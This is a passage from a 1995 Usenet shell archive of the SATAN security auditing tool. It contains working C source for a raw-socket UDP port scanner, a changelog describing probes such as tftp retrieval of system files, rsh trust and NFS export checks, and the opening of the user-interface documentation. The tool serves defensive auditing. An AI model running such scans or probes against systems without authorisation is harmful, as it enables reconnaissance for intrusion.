X int pkts; /* number of packets sent */
X};
X
Xstruct port_info *port_info = 0;
XRING active_ports; /* active sockets list head */
XRING dead_ports; /* dead sockets list head */
Xstruct port_info *find_port_info(); /* retrieve port info */
X
X /*
X * Performance statistics. These are used to update the transmission window
X * size depending on transmission error rates.
X */
Xdouble avg_irt = 0; /* inter-reply arrival time */
Xdouble avg_rtt = 0; /* round-trip time */
Xdouble avg_pkts = 1; /* number of packets sent per reply */
Xint probes_sent = 0; /* probes sent */
Xint probes_done = 0; /* finished probes */
Xint replies; /* number of good single probes */
Xstruct timeval last_reply; /* time of last reply */
X
Xint send_sock; /* send probes here */
Xint icmp_sock; /* read replies here */
Xfd_set icmp_sock_mask; /* select() read mask */
Xstatic struct sockaddr_in sin;
X
X /*
X * Helpers...
X */
X
X#define time_since(t) (now.tv_sec - t.tv_sec + 1e-6 * (now.tv_usec - t.tv_usec))
X#define sock_age(sp) time_since(sp->last_probe)
Xdouble average();
Xstruct port_info *add_port();
X
X/* main - command-line interface */
X
Xmain(argc, argv)
Xint argc;
Xchar *argv[];
X{
X int c;
X struct protoent *pe;
X char **ports;
X
X progname = argv[0];
X if (geteuid())
X error("This program needs root privileges");
X
X open_file_limit = open_limit();
X
X while ((c = getopt(argc, argv, "al:p:uUv")) != EOF) {
X switch (c) {
X case 'a':
X show_all = 1;
X break;
X case 'l':
X if ((hard_limit = atoi(optarg)) <= 0)
X usage("invalid load limit");
X break;
X case 'p':
X test_port = optarg;
X break;
X case 'u':
X want_err = EHOSTUNREACH;
X break;
X case 'U':
X want_err = ~EHOSTUNREACH;
X break;
X case 'v':
X verbose = 1;
X break;
X default:
X usage((char *) 0);
X break;
X }
X }
X argc -= (optind - 1);
X argv += (optind - 1);
X if (argc < 3)
X usage("missing argument");
X
X if (hard_limit > open_file_limit - 10)
X hard_limit = open_file_limit - 10;
X soft_limit = hard_limit + 1;
X init_port_info();
X
X if ((pe = getprotobyname("icmp")) == 0)
X error("icmp: unknown protocol");
X if ((icmp_sock = socket(AF_INET, SOCK_RAW, pe->p_proto)) < 0)
X error("icmp socket: %m");
X FD_ZERO(&icmp_sock_mask);
X FD_SET(icmp_sock, &icmp_sock_mask);
X
X if ((send_sock = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
X error("socket: %m");
X
X /*
X * First do a test probe to see if the host is up, and to establish the
X * round-trip time. This requires that the test port is not used.
X */
X memset((char *) &sin, 0, sizeof(sin));
X sin.sin_addr = find_addr(argv[1]);
X sin.sin_family = AF_INET;
X
X gettimeofday(&now, (struct timezone *) 0);
X last_reply = now;
X
X /*
X * Calibrate round-trip time and dead time.
X */
X for (;;) {
X scan_ports(test_port);
X while (ports_busy > 0)
X monitor_ports();
X if (avg_rtt)
X break;
X sleep(1);
X }
X scan_ports(test_port);
X
X /*
X * Scan those ports.
X */
X for (ports = argv + 2; *ports; ports++)
X scan_ports(*ports);
X
X /*
X * All ports probed, wait for replies to trickle back.
X */
X while (ports_busy > 0)
X monitor_ports();
X
X return (0);
X}
X
X/* usage - explain command syntax */
X
Xusage(why)
Xchar *why;
X{
X if (why)
X remark(why);
X error("usage: %s [-apuU] [-l load] host ports...", progname);
X}
X
X/* scan_ports - scan ranges of ports */
X
Xscan_ports(service)
Xchar *service;
X{
X char *cp;
X int min_port;
X int max_port;
X int port;
X struct port_info *sp;
X
X if (service == test_port)
X test_portno = atoi(test_port);
X
X /*
X * Translate service argument to range of port numbers.
X */
X if ((cp = strchr(service, '-')) != 0) {
X *cp++ = 0;
X min_port = (service[0] ? ntohs(find_port(service, "udp")) : 1);
X max_port = (cp[0] ? ntohs(find_port(cp, "udp")) : 65535);
X } else {
X min_port = max_port = ntohs(find_port(service, "udp"));
X }
X
X /*
X * Iterate over each port in the given range. Adjust the number of
X * simultaneous probes to the capacity of the network.
X */
X for (port = min_port; port <= max_port; port++) {
X sp = add_port(port);
X write_port(sp);
X monitor_ports();
X }
X}
X
X/* monitor_ports - watch for socket activity */
X
Xmonitor_ports()
X{
X do {
X struct port_info *sp;
X
X /*
X * When things become quiet, examine the port that we haven't looked
X * at for the longest period of time.
X */
X receive_answers();
X
X if (ports_busy == 0)
X return;
X
X sp = (struct port_info *) ring_succ(&active_ports);
X if (sp->pkts > avg_pkts * AVG_MARGIN) {
X report_and_drop_port(sp, 0);
X } else
X
X /*
X * Strategy depends on whether transit times dominate (probe
X * multiple ports in parallel, retransmit when no reply was
X * received for at least one round-trip period) or by dead time
X * (probe one port at a time, retransmit when no reply was
X * received for some fraction of the inter-reply period).
X */
X if (sock_age(sp) > (avg_rtt == 0 ? 1 :
X 2 * avg_rtt < avg_irt ? avg_irt / 4 :
X 1.5 * avg_rtt)) {
X write_port(sp);
X }
X
X /*
X * When all ports being probed seem to be active, send a test probe
X * to see if the host is still alive.
X */
X if (time_since(last_reply) > 3 * (avg_rtt == 0 ? 1 :
X avg_rtt < avg_irt ? avg_irt : avg_rtt)
X && find_port_info(test_portno) == 0) {
X last_reply = now;
X write_port(add_port(test_portno));
X }
X } while (ports_busy && (ports_busy >= hard_limit
X || ports_busy >= probes_done
X || ports_busy >= soft_limit));
X}
X
X/* receive_answers - receive reactions to probes */
X
Xreceive_answers()
X{
X fd_set read_mask;
X struct timeval waitsome;
X double delay;
X int answers;
X
X /*
X * The timeout is less than the inter-reply arrival time or we would not
X * be able to increase the load.
X */
X delay = (2 * avg_rtt < avg_irt ? avg_irt / 3 : avg_rtt / (1 + ports_busy * 4));
X waitsome.tv_sec = delay;
X waitsome.tv_usec = (delay - waitsome.tv_sec) * 1000000;
X
X read_mask = icmp_sock_mask;
X if ((answers = select(icmp_sock + 1, &read_mask, (fd_set *) 0, (fd_set *) 0,
X &waitsome)) < 0)
X error("select: %m");
X
X gettimeofday(&now, (struct timezone *) 0);
X
X /*
X * For each answer that we receive without retransmissions, update the
X * average roundtrip time.
X */
X if (answers > 0) {
X if (FD_ISSET(icmp_sock, &read_mask))
X receive_icmp(icmp_sock);
X }
X return (answers);
X}
X
X/* receive_icmp - receive and decode ICMP message */
X
Xreceive_icmp(sock)
Xint sock;
X{
X union {
X char chars[BUFSIZ];
X struct ip ip;
X } buf;
X int data_len;
X int hdr_len;
X struct ip *ip;
X struct icmp *icmp;
X struct udphdr *udp;
X struct port_info *sp;
X
X if ((data_len = recv(sock, (char *) &buf, sizeof(buf), 0)) < 0) {
X error("error: recv: %m");
X return;
X }
X
X /*
X * Extract the IP header.
X */
X ip = &buf.ip;
X if (ip->ip_p != IPPROTO_ICMP) {
X error("error: not ICMP proto (%d)", ip->ip_p);
X return;
X }
X
X /*
X * Extract the IP payload.
X */
X hdr_len = ip->ip_hl << 2;
X if (data_len - hdr_len < ICMP_MINLEN) {
X remark("short ICMP packet (%d bytes)", data_len);
X return;
X }
X icmp = (struct icmp *) ((char *) ip + hdr_len);
X data_len -= hdr_len;
X
X if (icmp->icmp_type != ICMP_UNREACH)
X return;
X
X /*
X * Extract the offending IP header.
X */
X if (data_len < offsetof(struct icmp, icmp_ip) + sizeof(icmp->icmp_ip)) {
X remark("short IP header in ICMP");
X return;
X }
X ip = &(icmp->icmp_ip);
X if (ip->ip_p != IPPROTO_UDP)
X return;
X if (ip->ip_dst.s_addr != sin.sin_addr.s_addr)
X return;
X
X /*
X * Extract the offending UDP header.
X */
X hdr_len = ip->ip_hl << 2;
X udp = (struct udphdr *) ((char *) ip + hdr_len);
X data_len -= hdr_len;
X if (data_len < sizeof(struct udphdr)) {
X remark("short UDP header in ICMP");
X return;
X }
X
X /*
X * Process ICMP subcodes.
X */
X switch (icmp->icmp_code) {
X case ICMP_UNREACH_NET:
X error("error: network unreachable");
X /* NOTREACHED */
X case ICMP_UNREACH_HOST:
X if (sp = find_port_info(ntohs(udp->uh_dport)))
X process_reply(sp, EHOSTUNREACH);
X break;
X case ICMP_UNREACH_PROTOCOL:
X error("error: protocol unreachable");
X /* NOTREACHED */
X case ICMP_UNREACH_PORT:
X if (sp = find_port_info(ntohs(udp->uh_dport)))
X process_reply(sp, ECONNREFUSED);
X break;
X }
X}
X
X/* process_reply - process reply */
X
Xprocess_reply(sp, err)
Xstruct port_info *sp;
Xint err;
X{
X double age = sock_age(sp);
X int pkts = sp->pkts;
X double irt = time_since(last_reply);
X
X /*
X * Don't believe everything.
X */
X if (age > 5) {
X age = 5;
X } else if (age < 0) {
X age = 1;
X }
X if (irt > 5) {
X irt = 5;
X } else if (irt < 0) {
X irt = 1;
X }
X
X /*
X * We jump some hoops for calibration purposes. First we estimate the
X * round-trip time: we use this to decide when to retransmit when network
X * transit time dominates.
X *
X * Next thing to do is to estimate the inter-reply time, in case the sender
X * has a "dead time" for ICMP replies; I have seen this happen with some
X * Cisco routers and with Solaris 2.4. The first reply will come fast;
X * subsequent probes will be ignored for a period of up to one second.
X * When this happens the retransmission period should be based on the
X * inter-reply time and not on the average round-trip time.
X */
X last_reply = now;
X replies++;
X if (pkts == 1)
X avg_rtt = (avg_rtt == 0 ? age : /* adopt initial rtt */
X average(age, avg_rtt)); /* normal processing */
X avg_irt = (avg_irt == 0 ? 1 : /* prepare for irt
X * calibration */
X avg_irt == 1 ? irt : /* adopt initial irt */
X average(irt, avg_irt)); /* normal processing */
X avg_pkts = average((double) pkts, avg_pkts);
X if (verbose)
X printf("%d:age %.3f irt %.3f pkt %d ports %2d soft %2d done %2d avrtt %.3f avpkt %.3f avirt %.3f\n",
X sp->port, age, irt, pkts,
X ports_busy, soft_limit,
X probes_done, avg_rtt, avg_pkts, avg_irt);
X report_and_drop_port(sp, err);
X}
X
X/* report_and_drop_port - report what we know about this service */
X
Xreport_and_drop_port(sp, err)
Xstruct port_info *sp;
Xint err;
X{
X struct servent *se;
X
X if (probes_done == 0) {
X if (err == 0)
X error("are we talking to a dead host or network?");
X } else if (show_all || want_err == err || (want_err < 0 && want_err != ~err)) {
X printf("%d:%s:", sp->port,
X (se = getservbyport(htons(sp->port), "udp")) ?
X se->s_name : "UNKNOWN");
X if (err && show_all)
X printf("%s", strerror(err));
X printf("\n");
X fflush(stdout);
X }
X drop_port(sp);
X}
X
X/* average - quick-rise, slow-decay moving average */
X
Xdouble average(new, old)
Xdouble new;
Xdouble old;
X{
X if (new > old) { /* quick rise */
X return ((new + old) / 2);
X } else { /* slow decay */
X return (0.1 * new + 0.9 * old);
X }
X}
X
X/* add_port - say this port is being probed */
X
Xstruct port_info *add_port(port)
Xint port;
X{
X struct port_info *sp = (struct port_info *) ring_succ(&dead_ports);
X
X ring_detach((RING *) sp);
X sp->port = port;
X sp->pkts = 0;
X ports_busy++;
X ring_append(&active_ports, (RING *) sp);
X return (sp);
X}
X
X/* write_port - write to port, update statistics */
X
Xwrite_port(sp)
Xstruct port_info *sp;
X{
X char ch = 0;
X
X ring_detach((RING *) sp);
X sin.sin_port = htons(sp->port);
X sp->last_probe = now;
X sendto(send_sock, &ch, 1, 0, (struct sockaddr *) & sin, sizeof(sin));
X probes_sent++;
X sp->pkts++;
X ring_prepend(&active_ports, (RING *) sp);
X
X /*
X * Reduce the sending window when the first retransmission happens. Back
X * off when retransmissions dominate. Occasional retransmissons will keep
X * the load unchanged.
X */
X if (sp->pkts > 1) {
X replies--;
X if (soft_limit > hard_limit) {
X soft_limit = (ports_busy + 1) / 2;
X } else if (replies < 0 && avg_irt) {
X soft_limit = 0.5 + 0.5 * (soft_limit + avg_rtt / avg_irt);
X replies = soft_limit / 2;
X }
X }
X}
X
X/* drop_port - release port info, update statistics */
X
Xdrop_port(sp)
Xstruct port_info *sp;
X{
X ports_busy--;
X probes_done++;
X ring_detach((RING *) sp);
X ring_append(&dead_ports, (RING *) sp);
X
X /*
X * Increase the load when a sufficient number of probes succeeded.
X * Occasional retransmissons will keep the load unchanged.
X */
X if (replies > soft_limit) {
X replies = soft_limit / 2;
X if (soft_limit < hard_limit)
X soft_limit++;
X }
X}
X
X/* init_port_info - initialize port info pool */
X
Xinit_port_info()
X{
X struct port_info *sp;
X
X port_info = (struct port_info *) mymalloc(hard_limit * sizeof(*port_info));
X ring_init(&active_ports);
X ring_init(&dead_ports);
X for (sp = port_info; sp < port_info + hard_limit; sp++)
X ring_append(&dead_ports, (RING *) sp);
X}
X
X/* find_port_info - lookup port info */
X
Xstruct port_info *find_port_info(port)
Xint port;
X{
X struct port_info *sp;
X
X for (sp = (struct port_info *) ring_succ(&active_ports);
X sp != (struct port_info *) & active_ports;
X sp = (struct port_info *) ring_succ((RING *) sp))
X if (sp->port == port)
X return (sp);
X return (0);
X}
END_OF_FILE
if test 15255 -ne `wc -c <'satan-1.1.1/src/port_scan/udp_scan.c'`; then
echo shar: \"'satan-1.1.1/src/port_scan/udp_scan.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/port_scan/udp_scan.c'
fi
echo shar: End of archive 3 $of 15$.
cp /dev/null ark3isdone

Wietse Venema

unread,

Apr 13, 1995, 3:00:00 AM4/13/95

Submitted-by: wswi...@wsbs06.win.tue.nl (Wietse Venema)
Posting-number: Volume 47, Issue 128
Archive-name: satan/part04

Environment: UNIX && HTML && Perl 5.0

#! /bin/sh

# This is a shell archive. Remove anything before this line, then feed it
# into a shell via "sh file" or similar. To overwrite existing files,
# type "sh file -c".

# Contents: satan-1.1.1/Changes
# satan-1.1.1/html/docs/user_interface.html satan-1.1.1/satan.ps
# satan-1.1.1/src/rpcgen/rpc_parse.c
# Wrapped by kent@ftp on Wed Apr 12 20:30:08 1995

PATH=/bin:/usr/bin:/usr/ucb:/usr/local/bin:/usr/lbin:$PATH ; export PATH
echo If this archive is complete, you will see the following message:

echo ' "shar: End of archive 4 (of 15)."'
if test -f 'satan-1.1.1/Changes' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/Changes'\"
else
echo shar: Extracting \"'satan-1.1.1/Changes'\" $16478 characters$
sed "s/^X//" >'satan-1.1.1/Changes' <<'END_OF_FILE'
X1.1.1
X
X- URL filter was too strict, would reject names with () in them.
X
X1.1
X
X- bundled in ctime.pl and getopts.pl from the perllib.
X- trouble shooting docs now integrated with FAQ, and a full week of feedback
X processed into FAQ and troubkle entries.
X- added a 13th vulnerability page. Irony has it that SATAN is the subject.
X Surprise: CERT/CC posts advisory *before* a software update is available.
X- SATAN now detects that HTML clients reveal parent URL information.
X- eliminated extraneous ping probes.
X- strerror() is provided whether or not the compiler understands ANSI.
X- prevent compiler warnings about "& before array" in rpcgen output.
X- use waitpid() to find out when the HTML browser terminates.
X- moved 'require getopts.pl' down in bin/*.satan scripts.
X- fixed typos/errors/omissions/ambiguities in the documentation.
X- the -c option now changes individual perl variables. Example:
X -c "dont_use_nslookup = 1; dont_use_icmp = 1". Useful for config
X variables that have no command-line option.
X- dropped the -c alternate config file feature. There is no easy way
X to both set *and* override defaults (short of writing our own getopt).
X- getfqdn() could be blind for nameless hosts when nslookup was enabled.
X- getfqdn() would be blind for nameless hosts when nslookup was disabled.
X- rsh test no longer relies on the rsh or remsh command (it worked
X only when the target account exists on the probing host), and it
X now makes difference between "host trusts everyone" and "account
X trusts everyone". It would claim that hosts are open when they
X refuse access with a tcp wrapper banner message.
X- append dot in dns.satan query to avoid spurious name servers being
X listed. This also may make things faster.
X- avoid duplicate "exports to the world" message (shut up showmount
X message when running from an untrusted host).
X- added HTML client address check, in case the magic cookie leaks out.
X This is just a last barrier; cookies should never be disclosed.
X- added URL name address check, in case the magic cookie leaks out.
X This is just a last barrier; cookies should never be disclosed.
X- added an ANSI/POSIXized version of the rpcgen command for systems
X without one (ultrix, some sysv4 versions).
X- more Linux support. There are many Linux versions so who knows where
X this will work.
X- rsh tests are now executed only when the probing host is untrusted.
X- avoid duplicate tftp problem message by making it different for read
X and write.
X
X1.0! We made it!
X
X- just in case, dropped TUE references from all code except safe_finger
X (which was stolen from the TCP wrapper) and the admin guide (which
X was already posted one year ago with TUE reference in it).
X- dropped the unused rcmdinfo tool.
X- linked the troubleshooting guide.
X- deleted all references to set-uid tools - scripts cannot be made setuid.
X- added note about parallel runs to the satan.8 man page.
X- will ask the user to set $dont_use_dns when nslookup fails.
X- README & TODO - added disclaimer on parallelism; added AFS & SNMP to our
X TODO list.
X- rm'd fireup
X- added proxy stuff to README and troubleshooting.html
X
X0.93
X
X- minor typos in the documentation keep popping up...
X- worked around a sys_errlist[] declaration clash in freebsd 2.0.
X- changed references to "session key" to "magic cookie".
X- fixed "back to.." link in the system requirements.
X- gave the session key writeup a more architectural tone.
X- fixed another duplicate filtering bug in danger report.
X- SATAN no longer dies (undefined host) when given an incomplete database.
X- clearer distinction of in-core and on-disk databases, and what happens
X when you load/merge/open/query them.
X- fixed some typos in the FAQ.
X- commented out offending commands in satan.ps
X- fixed some typos in sendmail check.
X
X0.91
X
X- docs: user_interface, the_main_parts, satan_reference, satan_overview,
X satan.db, FAQ (incl. adding your stuff to FAQ)
X- rules - 2 more sendmail checks - (<= 5.60), (<=5.65 && dynix) in facts,
X improved DYNIX recognition
X- changed tutorial Sendmail_vulnerabilities.html
X
X0.90
X
X- more consistency (use of SATAN logo, intermediate headings).
X- broke down documentation into overview and reference.
X- fixed some dead links (_ instead of -).
X- figured out why lynx would not start up a problm.
X
X- put back in old/new satan.ps
X- writable-FTP tutorial - added cert link
X- reconfig - changed error msg to be more clear
X- minor changes to README
X- minor grammar and spelling changes to satan.8
X- Changed several docs - clarity, expansion, etc.
X- put in the troubleshooting.html guide
X
X- figured out why nfs-chk/yp-chk had trouble with Solaris.
X
X- cloned nfs-chk.satan to yp-chk.satan for nis map accessibility test.
X- added -d (domain name) option to ypbind.satan.
X- cloned nfs-chk to yp-chk and plugged in an YP client call.
X- Linux users are now instructed to copy BSD includes into the satan tree.
X
X- found the nfs ghost - missing initialization in dynamic page.
X- why tcpscan was too quick claimin telnet on non-std port.
X- added <HTML><HEAD><BODY> to the dynamic HTML pages.
X- consistent spelling of names (caps).
X- copied the alpha satan.ps, the ./satan.ps was busted.
X- changed font in acknowledgements from fixed width to something more
X palatable.
X
X- bold faced our names in authors.html
X- fixed satan => SATAN in satan.8
X- added satan.ps
X- modified/added to html/docs/FAQ.html (red 'n' black dot controversy
X on a B/W screen, changing HTML viewers, etc.)
X- mv'd html/docs/admin_guide_to_cracking => $!.html
X- changed a link in html/docs/references.html to above
X- changed html/docs/user_interface.html to have ALT's to dots
X- put a <HTML>, <HEAD>, and <BODY> into html/docs/*.html, and
X in html/tutorials/vulnerability/*, also added some "ALT=..."
X- put in (identical) warnings about tcp-wrappers/reverse fingers, in
X running for the first time tutorial and general usage docs.
X- nuked the glossary - no time to finish it right.
X- Nuked *.orig, *.bak, *.old
X
X- satan ships with execute bits off, to avoid stupid questions from people
X that did not run `reconfig' first, as described in the README file.
X- debugging mode is now off by default. You can tail -f the status_file
X to watch progress.
X- added a first README file to get people started.
X- workaround for Solaris broken naming service (no cname to offical name)
X- added a few more names to the acknowledgements, fixed the simple-minded
X "sort +1" that sorted on second name instead of last name.
X- in vulnerability tutorials, moved admin-guide links under the "other tips".
X- in the modem vulnerability tutorial, the phone bill went to the wrong party.
X- added sys/select.h includes for AIX.
X- now sorts subnets numerically
X
X- acknowledgements
X- put in the modem check... I hope this regex doesn't match
X anything else by mistake! (This is in rules/facts) I'm making it
X a "root" severity problem, just because it's so ghastly, more than
X it being such a severe problem on that host.
X- fixed tftp to get /etc/group instead of /etc/passwd
X- html/docs/satan_doc.pl - added trust section
X- html/docs/trust.html - discussion of trust
X- fixed names in satan.8
X- fixed my personal statement
X- FIXED (!!!) back the satan control panel. Data management should NOT
X go first.
X- fixed grammar html/tutorials/vulnerability/REXD_access
X- uncommented root rsh and SGI rsh as guest
X- reconfig - add whoami
X- uncommented FAQ; still needs lots of work!
X- made links from tutorials to admin-guide-to-cracking
X- now show the current database name in the "open database" text field.
X- added -u (running from untrusted host) option and $untrusted variable.
X- changed wording of worldwide exports in nfs-chk.satan
X- moved umask 077 to main satan
X- tcpscan now continues after ICMP_UNREACH_NET or ICMP_UNREACH_PROTOCOL.
X- network targets didn't work anymore.
X- added "view primary target results" link.
X- target acq screen: added explanation of "normal" and "heavy" scans.
X- trust reports now sort by trust type as default.
X- added -A (proximity descent) and -z (sub zero proximity) options.
X- used wrong hostname variable in sort-by-trust-type reports.
X- dropped proximity stuff from the target acquisition screen.
X- fixed references to old timeout variable names in the admin html pages.
X- more trust classification rules.
X- added ';' after shell built-ins in Makefile (for HP-UX make).
X
XSatan beta 0.5
X
X- rescan is now default: before scanning, SATAN always drops old
X information on primary hosts. Too many problems with todo rules
X being skipped at a low attack level, and never being triggered
X again whe the attack level was increased.
X- wrote a UNIX man page so we can tell them to Read the fine manual.
X- data mgt moved to the top - if you collect data first it does not
X make sense to change databases later.
X- added "back to SATAN report analysis" links to the report screens.
X- worked around strange behavior when host or domain names end in au.
X fix: all dynamic URLs now end in a comma.
X- some error screens had a non-standard layout.
X- replacing TYPE=NAME by TYPE="name" made things work better with Mosaic.
X- tcp_scan will calm down when the kernel runs out of file descriptors.
X- fixed extraneous Add-fact/todo/target messages in verbose logs.
X- fixed defective duplicate filter in danger level report.
X- added OSF to the list of mainstream systems (weird...)
X- save database to temp files, then rename. This avoids data loss
X when the program is interrupted while saving. We should append
X new stuff only but I'm not going to change the inference engine
X in the last hour before the final beta.
X- all shell commands go through one routine so nothing escapes timeouts.
X
X- added SONY NEWS machines to hosttype, fixed apple type, now picks up BSDI
X OS version
X- added an AUTHOR file in src/fping, to point to the current maintainer.
X- fixed reconfig to not look at dirs that don't exist, echo correct message,
X look for remsh & if it exists, use it instead of rsh. Changed top line
X to be a better way (you might check this out; this was suggested by
X tom christianson & larry wall, so I trust it.)
X- changed the satan.probes.html documentation significantly; minor change
X to satan_documentation to reflect this.
X- added grep into paths.sh
X- moved data management menu item below targeting and results on main
X control panel (html/satan.pl) - I really want to have targeting first,
X then analysis, then the rest!
X- created a wu-archive ftp tutorial
X- small change in analysis.pl; "Widely" seems redundant, nuked it.
X- added question about multiple fingers to FAQ
X
X- not scanned hosts are now called "not scanned" instead of "unknown type".
X
X- added sort-by-trust-type links to the trusted and trusting host displays
X- documented the trust rule base.
X- fixed typo in trusting host sort order.
X- restored control panel order: choose data base before collecting data.
X- port scanners now take service names from config/services so that our
X inference rules will be more robust. The system services tables are
X used for everything not found in SATAN's service tables.
X- began cleaning up the html. Combining both quoting and italics on the
X same word is just too much.
X- some hosts would stay "unknown type" after rescanning. Fix: add an UNKNOWN
X pattern to rules/hosttype that matches both "" and "unknown type".
X- deleted the html/query subdirectory
X- SATAN now maintains a per-host last access time, displayed with host details.
X- faux-fping took only one argument and always did subnet expansion.
X I replaced it by an fping-compatible one-liner.
X- updated docs about current locations of files.
X- subtle bugs eliminated by using explicit loop controls instead of $_.
X- subnet expansion did not update attack levels of already known hosts.
X- reconfig no longer needs to have #!/path/to/perl.
X- get_targets moved to bin.
X
X- fixed rsh.satan to not depend on remote location of commands
X- can now merge data bases (GUI only).
X- fix_hostname.pl could map IP addresses to unqualified hostnames.
X- SATAN could skip hosts that were dead on a previous run.
X- added support to rescan primary hosts (ignore old primary host results).
X- added -o option for 'scan only these'.
X- added -O option for 'skip these'.
X- added -c option for alternate config file.
X
XSatan 0.40 beta:
X
X- slightly changed -V flag to satan; prints out version, found in version.pl
X- removed *box*.gif *triangle*.gif from images directory
X- removed all but black, red, pink, and purple dots from dots dir
X- swept through all html files with a fairly fine-toothed comb and
X programs, fixed all syntax errors that I could find. This is mostly,
X actually, the html/docs & html/tutorials dirs.removed "lines" subdirectory
X- all tool etc. file names are now controlled from config files.
X- now handles combinations of `scan only these' and `don't scan' exceptions.
X- now accepts multiple exceptions for `scan only these' and `don't scan'.
X- configuration GUI screen now shows current exception patterns.
X- syntax of exeption patterns changed from regexps to shell style.
X it was symply too painful to get right.
X- config file edit script used the raw HTML attribute list with %hex codes.
X- generic editing of %hex codes emitted by web viewers.
X- GUI will now show a trace (with time stamps) of what satan is doing.
X- configurable pathnames in sh scripts moved to central file.
X- lots of dead links in the docs fixed.
X- big one: separate directories for config, commands, rules, scripts.
X- added "make setuid" target to the main Makefile.
X- status file is now updated when satan terminates.
X- status file cannot be specified on the command line (for parallel runs).
X
XSatan 0.36 beta:
X
X- added "continue with report and analysis" link to data management.
X- added a rules/trust file to classify trust relationships by type.
X- put back the "widely trusting hosts" link in the report table of contents.
X- added a $dont_use_ping flag (config file, docs and GUI) so you can make
X SATAN believe that hosts are always reachable.
X
XSatan 0.34 beta:
X
X- print an error when get_targets fails instead of mysteriously terminating.
X- all hostnames should now be translated to lowercase
X- zap all prixy environment variables except no_proxy.
X- numerical $dont_attack_these and $only_attack_these patterns now work.
X- the boot.satan will now fire only when the client hostname resolves
X- DNS: added a $dont_use_nslookup flag (config file, docs and GUI).
X- made the rpcinfo tool more accurate.
X- use safe_finger instead of plain finger (thanks Lionel).
X- updated the documentation (fping is bundled, attack level probe lists).
X- fixed some list problems that Mosaic could choke on.
X- re-wrote the satan.cf attack level lists as per Lionel's suggestion.
X This makes the portscanner implementation much cleaner. Tools are now
X listed _with_ arguments, so no more automatic ".satan" tricks.
X- rules.services claimed all gopher or www servers on non-standard ports.
X- fixed output flushing in *.satan tools.
X
XSatan 0.33 beta:
X
X- minor portscan.satan fix (will rewrite this according to Lionel's suggestion).
X- more reconfig fixes (would replace perl5 by perl55)
X- more shell command filtering
X- fixed timeout order in satan script
X- portability fixes for the tcp/udp port scanner (hp-ux)
X
XSatan 0.3 beta:
X
X- found why SATAN would no longer look up the host IP of unprobed hosts.
X- Doesn't die when reading malformed data
X- slight fix to nfs-chk.satan
X- cleaned up some html stuff/dead links
X- Added a test for pre 2.4 wustl ftp servers
X- Ever so small correction to reconfig... (I'm going to rewrite this in perl.)
X
XSatan 0.2 beta:
X
X- will now tell via the GUI how many hosts were visited.
X- GUI now shows status (unreachable) and scanning level info in the
X per-host report.
X- fixed the reconfig script so it won't mangle perl path names anymore
X- will now tell you to become root or to make fping, tcp_scan etc. set-uid.
X- added a -V (version) command-line option. Unfortunately, PERL still
X dumps core on IRIX 5.3 when SATAN is given a command-line option.
X- added a $running_under_html flag for GUI diagnostics
X
XSatan 0.1 beta:
X
X- fping is now completely integrated with satan.
X- better support of recursive `make -n'.
X- queries by host now support FQDN completion.
X- several broken html links fixed.
X- final solution for the sys/socket.ph problem.
X- Web client will now connect to hostname instead of 127.0.0.1.
X- nfs-chk tries both privileged and unprivileged client ports in the same run.
X- cleanup nslookup [x.x.x.x] result when cannot find a host.
END_OF_FILE
if test 16478 -ne `wc -c <'satan-1.1.1/Changes'`; then
echo shar: \"'satan-1.1.1/Changes'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/Changes'
fi
if test -f 'satan-1.1.1/html/docs/user_interface.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/user_interface.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/user_interface.html'\" $16171 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/user_interface.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>The SATAN User Interface</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">The SATAN User Interface</H1>
X<HR>
XSATAN was designed to have a very "user friendly"
Xuser interface. Since it is extremely difficult to create a good user
Xinterface from scratch, we stole everyone else's. All of the output (of
Xthe non-debugging sort) and nearly all of the interface uses HTML,
Xso as a user you can utilize any number of incredible HTML display
Xprograms such as Netscape, Mosaic, lynx (for those stuck with text-only
Xdisplays), etc.
X<p>
XSubsections in the User Interface section:
X<UL>
X<LI><A HREF="#basics">The Basics</A>
X<LI><A HREF="#data-mgmt">Data Management</A>
X<LI><A HREF="#gathering-data">Gathering Data</A>
X<LI><A HREF="#looking">Looking at and understanding the results</A>
X<LI><A HREF="#tricky-implications">Hints, Further tricky security implications,
Xor Getting The Big Picture (tm)</A>
X<LI><A HREF="#command-line">The Command-line Interface</A>

X</UL>
X<hr>
X

X<p>
X<A NAME="basics"><H3>The Basics</H3></A>
X<STRONG>An HTML browser is REQUIRED to do report queries</STRONG>.
XIt is highly suggested that you use it to read the
Xdocumentation, if nothing else to print it out and read it via
Xhard-copy, since it's also all in HTML (later versions of SATAN will
Xalmost certainly have non-HTML documentation, but the time pressures of
Xthe project eliminated this as a viable option for the first release of
XSATAN.)
X(While all of the program interface and documentation uses hypertext
Xextensively; it's beyond the scope of this document to explain how to
Xuse a HTML browser, but all of them come with fairly extensive
Xdocumentation and are very easy to use.)
X<p>
XThis part of the documentation covers some of the basic design concepts
Xand how to move around the SATAN user interface. However, <STRONG>with
Xthe exception of the <I>target acquisition</I> part of the
Xprogram</STRONG> (we don't want you to learn how to probe hosts by trial
Xand error!), the best way to learn how to use the program is to
Xsimply start pointing and clicking with your mouse or with the arrow
Xkeys on your keyboard.
X
X<p>
X<A NAME="data-mgmt"><H3>Data Management</H3></A>
XSATAN has a very simple way of opening or creating its databases (this
Xis how SATAN keeps all of its records, including the hosts that it's seen
X(in the <I>all-hosts</I> file), the current set of facts (in the
X<I>facts</I> file), and what should be run next (<I>todo</I>) - see the
X<A HREF="satan.db.html">SATAN database description</A> if you'd like
Xmore information on those files.
X
X<p>
XAll of SATAN's data collection output will go to the current set of
Xdatabases, which are kept in the results directory in a subdirectory
Xthat has the current database name. A default database, called
X<i>satan-data</i> will be automatically created if no other name is
Xchosen.
X
X<p>
XIf you choose the <I>SATAN Data Management</I> from the <I>SATAN Control
XPanel</I>, you have three choices; open an existing set of data,
Xstart a new database, or to merge the contents of an on-disk database
Xwith the in-core data.
X
X<p>
X<STRONG>Note!</STRONG>
XOpening or creating a new database will destroy all other in-core
